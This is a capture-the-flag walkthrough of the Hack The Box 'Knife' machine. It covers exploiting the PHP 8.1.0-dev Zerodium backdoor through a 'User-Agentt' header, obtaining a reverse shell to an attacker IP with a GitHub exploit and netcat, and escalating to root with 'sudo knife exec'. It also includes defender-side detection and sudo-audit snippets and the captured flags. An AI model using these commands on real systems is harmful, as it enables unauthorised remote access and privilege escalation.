Knife

htb linux easy php-backdoor zerodium knife-cli sudo

Machine Information

  • Platform: Linux
  • Difficulty: Easy
  • IP Address: 10.129.235.78

Initial Enumeration

Nmap Scan

attacker@kali
attacker@kali:~$ nmap -Pn -p- -sC -sV --min-rate 5000 10.129.235.78
Nmap Scan Results

Service Enumeration

Web Application

attacker@kali
attacker@kali:~$ whatweb http://knife.htb
WhatWeb Results
http://knife.htb [200 OK] Apache[2.4.41], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[10.129.235.80], PHP[8.1.0-dev], Script, Title[Emergent Medical Idea], X-Powered-By[PHP/8.1.0-dev]

The web application appears to be a simple static site with no interactive features, parameters, or links. However, the server is running PHP 8.1.0-dev.

Vulnerability Discovery with Nuclei

attacker@kali
attacker@kali:~$ nuclei -u http://knife.htb
Nuclei Vulnerability Scan
Critical Vulnerability Detected
Nuclei detected php-zerodium-backdoor-rce, indicating the server is vulnerable to the PHP 8.1.0-dev Zerodium backdoor.

Exploitation

PHP 8.1.0-dev Zerodium Backdoor

In March 2021, the PHP Git repository was compromised in a supply chain attack. Malicious actors inserted a backdoor into the PHP 8.1.0-dev version by modifying the zend_eval_string function to execute arbitrary code when a specific HTTP header (User-Agentt with double ’t’) contains the string zerodiumsystem().

Backdoor Mechanism

The backdoor checks for a User-Agentt header ending in zerodiumsystem('COMMAND'); and executes the command within the parentheses.

Example:

User-Agentt: zerodiumsystem('id');

This would execute the id command on the server.
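As an added defender-side example (not part of the original writeup), a small Python check that flags the trigger shape described above in a raw HTTP request: the zerodium string in any header value, and header names one edit away from a standard name, such as User-Agentt. The sample request is constructed, and the known-header list is an assumption to tune per environment.

```python
import re

# Assumed baseline of header names a request normally carries; a name that is
# one edit away from one of these but not in the set (User-Agentt) is suspicious.
KNOWN_HEADERS = {
    "host", "user-agent", "accept", "accept-encoding", "accept-language",
    "connection", "content-type", "content-length", "cookie", "referer",
}

# Constructed sample in the trigger shape described above, not a real capture.
SAMPLE_REQUEST = (
    b"GET / HTTP/1.1\r\n"
    b"Host: knife.htb\r\n"
    b"User-Agentt: zerodiumsystem('id');\r\n"
    b"Accept: */*\r\n\r\n"
)

def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance, used to spot look-alike header names."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def parse_headers(raw: bytes) -> list[tuple[str, str]]:
    """Split a raw HTTP/1.x request head into (name, value) pairs, keeping duplicates."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    pairs = []
    for line in head.split("\r\n")[1:]:          # skip the request line
        if ":" in line:
            name, value = line.split(":", 1)
            pairs.append((name.strip(), value.strip()))
    return pairs

def scan_request(raw: bytes) -> list[str]:
    """Return alert strings for the backdoor trigger string and look-alike header names."""
    alerts = []
    for name, value in parse_headers(raw):
        lname = name.lower()
        if "zerodium" in value.lower():
            alerts.append(f"backdoor trigger string in header {name}")
        if lname not in KNOWN_HEADERS:
            for known in KNOWN_HEADERS:
                if edit_distance(lname, known) == 1:
                    alerts.append(f"look-alike header {name} (near {known})")
                    break
    return alerts
```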

I used a public exploit from GitHub:

attacker@kali
attacker@kali:~$ git clone https://github.com/PenTestical/PHP-8.1.0-dev_RCE
attacker@kali:~$ cd PHP-8.1.0-dev_RCE
attacker@kali:~$ chmod +x exploit.sh
attacker@kali:~$ ./exploit.sh
Exploit Execution
PHP 8.1.0-dev - Remote Code Execution
Target host IP (e.g. 10.10.10.242): 10.129.235.82
Enter your attacker IP address: 10.10.15.254
Enter your attacker port (4444): 4444
Did you started your reverse shell at port 4444? (Y/N) Y
Ok! Done! Reverse shell obtained!

Reverse Shell

In a second terminal, I set up a netcat listener:

attacker@kali
attacker@kali:~$ nc -nvlp 4444
Reverse Shell Connection
listening on [any] 4444 ...
connect to [10.10.15.254] from (UNKNOWN) [10.129.235.82] 35884
/bin/sh: 0: can't access tty; job control turned off
$ whoami
james
$ ls -la /home/james
total 40
drwxr-xr-x 5 james james 4096 May 18  2021 .
drwxr-xr-x 3 root  root  4096 May  6  2021 ..
lrwxrwxrwx 1 james james    9 May 10  2021 .bash_history -> /dev/null
-rw-r--r-- 1 james james  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 james james 3771 Feb 25  2020 .bashrc
drwx------ 2 james james 4096 May  6  2021 .cache
drwxrwxr-x 3 james james 4096 May  6  2021 .local
-rw-r--r-- 1 james james  807 Feb 25  2020 .profile
-rw-rw-r-- 1 james james   66 May  7  2021 .selected_editor
drwx------ 2 james james 4096 May 18  2021 .ssh
-r-------- 1 james james   33 Oct 16 20:28 user.txt
USER FLAG HTB
ec24a7387e0cc98c99332edee7ebf065

Post-Exploitation Enumeration

Shell
james@knife sudo -l
Sudo Permissions
Matching Defaults entries for james on knife:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife

The user can run /usr/bin/knife as root without a password.
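An added example, not from the writeup: a Python parser for the sudo -l output above that flags passwordless root grants on tools whose documented features include evaluating code, as knife exec does. The sample output is reproduced from this box; the flagged-tool table is an assumption to extend from your own review.

```python
import os
import re
from dataclasses import dataclass

# Sample input: the sudo -l output from this box, reproduced for the parser.
SUDO_L_OUTPUT = r"""Matching Defaults entries for james on knife:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife
"""

# Assumption: tools with a documented "run code" feature; extend from your own review.
CODE_EXEC_TOOLS = {"knife": "knife exec evaluates Ruby supplied on the command line"}

# One "(runas) TAG: /path args" line from the commands section.
ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>/\S.*)$")

@dataclass
class SudoEntry:
    runas: str        # user the command runs as (group part dropped)
    nopasswd: bool    # NOPASSWD tag present
    command: str      # command path plus any argument restriction

def parse_sudo_l(output: str) -> list[SudoEntry]:
    """Extract the command grants from `sudo -l` output; Defaults lines are skipped."""
    entries, in_commands = [], False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_commands = True
            continue
        m = ENTRY_RE.match(line) if in_commands else None
        if m:
            runas = m["runas"].split(":")[0].strip()
            entries.append(SudoEntry(runas, "NOPASSWD:" in m["tags"], m["cmd"].strip()))
    return entries

def audit_sudo(entries: list[SudoEntry]) -> list[str]:
    """Flag passwordless root grants on tools that can evaluate arbitrary code."""
    findings = []
    for e in entries:
        tool = os.path.basename(e.command.split()[0])
        if e.runas in ("root", "ALL") and e.nopasswd and tool in CODE_EXEC_TOOLS:
            findings.append(f"{e.command} as {e.runas} without a password: {CODE_EXEC_TOOLS[tool]}")
    return findings
```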

What is Knife?
Knife is a command-line tool from the Chef configuration management ecosystem. It serves as the primary interface between a local chef-repo and the Chef Infra Server, used in DevOps environments to automate infrastructure provisioning and configuration.

GTFOBins Reference: knife


Privilege Escalation

Knife Exec Command

The knife exec command allows executing Ruby code, which can be abused to spawn a shell:

Shell
james@knife sudo knife exec -E 'exec "/bin/sh"'
Root Shell via Knife Exec
$ sudo knife exec -E 'exec "/bin/sh"'
whoami
root
cd /root
ls -l
total 12
-rwxr-xr-x 1 root root  105 May  8  2021 delete.sh
-r-------- 1 root root   33 Oct 16 20:28 root.txt
drwxr-xr-x 3 root root 4096 May  6  2021 snap
ROOT FLAG HTB
c19040739347964c0bd63d2598f77706

Loot

No credentials were required for this box - exploitation was achieved through the PHP 8.1.0-dev Zerodium backdoor, and privilege escalation through the knife CLI sudo permission.


Key Takeaways

  1. Supply Chain Attacks can compromise even trusted software repositories - the PHP 8.1.0-dev backdoor is a perfect example
  2. Development versions of software should never be deployed in production environments
  3. The User-Agentt header (with double ’t’) was the trigger for the backdoor - unusual HTTP headers should be monitored
  4. Knife CLI can execute arbitrary Ruby code with knife exec, making it dangerous when run with sudo privileges
  5. Always check for sudo permissions after gaining initial access - they often lead to privilege escalation